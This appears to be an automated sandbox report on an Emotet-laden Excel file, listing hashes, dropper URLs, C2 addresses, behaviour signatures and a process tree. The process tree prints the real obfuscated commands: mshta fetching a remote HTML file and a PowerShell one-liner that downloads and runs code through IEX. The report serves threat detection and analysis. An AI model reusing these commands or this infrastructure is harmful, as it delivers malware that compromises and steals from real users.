Analysis

  • max time kernel
    121s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 01:07

General

  • Target

    UNM250124770WQ.xls

  • Size

    46KB

  • MD5

    9ac0fa065828c187a22b526eea1ad83b

  • SHA1

    242681b858b50c76f8aeab1e75ff46d19f67c7c9

  • SHA256

    e6bb11b13821b7ea0b993c919bc0981f30b1dcd5dfa1780f46ec52fd351f2655

  • SHA512

    fdb67c0a67411eea4d4302bbd5567159d1ea5a2668202746a6891fe6639778779a7bcd2b9329a821b05cc3f909c695f5ff98f1f4cbc581a075ed45ef3b2fa761

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\UNM250124770WQ.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2616
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4196
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:4232
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4872
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1560
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1612
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1980
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Sxoxchrlgiujqu\iejxqgdy.zij",JsgvSfeOuwHTjf
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2620
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Sxoxchrlgiujqu\iejxqgdy.zij",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2188
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 4232 -s 1624
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4152

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    047c2356f6fca3412dcac51cfba937c4

    SHA1

    9fb1a5e24e77767cf157879bb02eff71692eba2e

    SHA256

    20c15e85b846dca4beb07a229749ebe688ef5af18617a79739895264f59c4564

    SHA512

    c47236585104b733476cb7f37627431f03e8b5079b9a31e8b466657a796538ad690adc8c0b41c6c1340a978b38a052c8993eb1b79b1685f8da3d9fd640caeba3

  • \ProgramData\QWER.dll
    MD5

    047c2356f6fca3412dcac51cfba937c4

    SHA1

    9fb1a5e24e77767cf157879bb02eff71692eba2e

    SHA256

    20c15e85b846dca4beb07a229749ebe688ef5af18617a79739895264f59c4564

    SHA512

    c47236585104b733476cb7f37627431f03e8b5079b9a31e8b466657a796538ad690adc8c0b41c6c1340a978b38a052c8993eb1b79b1685f8da3d9fd640caeba3

  • \ProgramData\QWER.dll
    MD5

    047c2356f6fca3412dcac51cfba937c4

    SHA1

    9fb1a5e24e77767cf157879bb02eff71692eba2e

    SHA256

    20c15e85b846dca4beb07a229749ebe688ef5af18617a79739895264f59c4564

    SHA512

    c47236585104b733476cb7f37627431f03e8b5079b9a31e8b466657a796538ad690adc8c0b41c6c1340a978b38a052c8993eb1b79b1685f8da3d9fd640caeba3

  • memory/1612-321-0x0000000002EC0000-0x0000000002EE5000-memory.dmp
    Filesize

    148KB

  • memory/1980-333-0x0000000005730000-0x0000000005755000-memory.dmp
    Filesize

    148KB

  • memory/1980-324-0x0000000004E80000-0x0000000004EA5000-memory.dmp
    Filesize

    148KB

  • memory/1980-335-0x0000000005790000-0x00000000057B5000-memory.dmp
    Filesize

    148KB

  • memory/1980-331-0x00000000056D0000-0x00000000056F5000-memory.dmp
    Filesize

    148KB

  • memory/1980-329-0x0000000005570000-0x0000000005595000-memory.dmp
    Filesize

    148KB

  • memory/1980-339-0x0000000005960000-0x0000000005985000-memory.dmp
    Filesize

    148KB

  • memory/1980-327-0x0000000005490000-0x00000000054B5000-memory.dmp
    Filesize

    148KB

  • memory/2188-343-0x00000000045D0000-0x00000000045F5000-memory.dmp
    Filesize

    148KB

  • memory/2188-340-0x0000000002660000-0x0000000002685000-memory.dmp
    Filesize

    148KB

  • memory/2616-381-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/2616-118-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/2616-117-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/2616-116-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/2616-119-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/2616-380-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/2616-382-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/2616-383-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/2616-115-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/2616-129-0x00007FFA94C50000-0x00007FFA94C60000-memory.dmp
    Filesize

    64KB

  • memory/2616-128-0x00007FFA94C50000-0x00007FFA94C60000-memory.dmp
    Filesize

    64KB

  • memory/2620-336-0x0000000004910000-0x0000000004935000-memory.dmp
    Filesize

    148KB

  • memory/4872-314-0x0000024781CE0000-0x0000024781D32000-memory.dmp
    Filesize

    328KB

  • memory/4872-309-0x000002479AC40000-0x000002479ACB6000-memory.dmp
    Filesize

    472KB

  • memory/4872-298-0x000002479A800000-0x000002479A83C000-memory.dmp
    Filesize

    240KB

  • memory/4872-285-0x0000024781CE0000-0x0000024781D32000-memory.dmp
    Filesize

    328KB

  • memory/4872-284-0x0000024781CE0000-0x0000024781D32000-memory.dmp
    Filesize

    328KB

  • memory/4872-277-0x000002479A440000-0x000002479A462000-memory.dmp
    Filesize

    136KB